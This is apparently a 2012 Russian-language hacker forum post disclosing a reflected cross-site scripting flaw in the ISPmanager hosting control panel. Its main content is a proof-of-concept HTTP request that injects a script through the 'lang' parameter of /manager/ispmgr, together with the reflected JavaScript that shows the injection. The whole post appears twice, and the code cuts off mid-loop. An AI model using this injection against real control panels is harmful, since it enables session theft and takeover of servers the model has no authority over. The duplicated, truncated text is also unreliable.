Pirotexnik
10.07.2012, 16:56
[Intro]Доброго времени суток.
Ковырял бложек, наткнулся на сабж. В сабже ХСС.
[PoC]http://s1.ipicture.ru/uploads/20120710/thumb/6zSZ4NFn.png (http://s1.ipicture.ru/Gallery/Viewfull/11708762.html)
Code:
GET /manager/ispmgr?lang=";alert("PWNED+BY+p1r0!");// HTTP/1.1
Cookie: PHPSESSID=nblmvs0lg0bfgvhu0uk4l1r2t5; ads=4815162342; ground=0; best=5; ispmgr4=aqua:ua:0
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
Code:
var imgpath = '/manimg/aqua/';
document.write( "" );
var binary = "/manager/ispmgr";
function setThemeLang () {
var theme = "aqua";
var lang = "";alert("PWNED BY p1r0!");//";
for ( var i=0; i
Офф сайт разрабов: http://ispsystem.com/ru/
Ковырял бложек, наткнулся на сабж. В сабже ХСС.
[PoC]http://s1.ipicture.ru/uploads/20120710/thumb/6zSZ4NFn.png (http://s1.ipicture.ru/Gallery/Viewfull/11708762.html)
Code:
GET /manager/ispmgr?lang=";alert("PWNED+BY+p1r0!");// HTTP/1.1
Cookie: PHPSESSID=nblmvs0lg0bfgvhu0uk4l1r2t5; ads=4815162342; ground=0; best=5; ispmgr4=aqua:ua:0
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
Code:
var imgpath = '/manimg/aqua/';
document.write( "" );
var binary = "/manager/ispmgr";
function setThemeLang () {
var theme = "aqua";
var lang = "";alert("PWNED BY p1r0!");//";
for ( var i=0; i
Офф сайт разрабов: http://ispsystem.com/ru/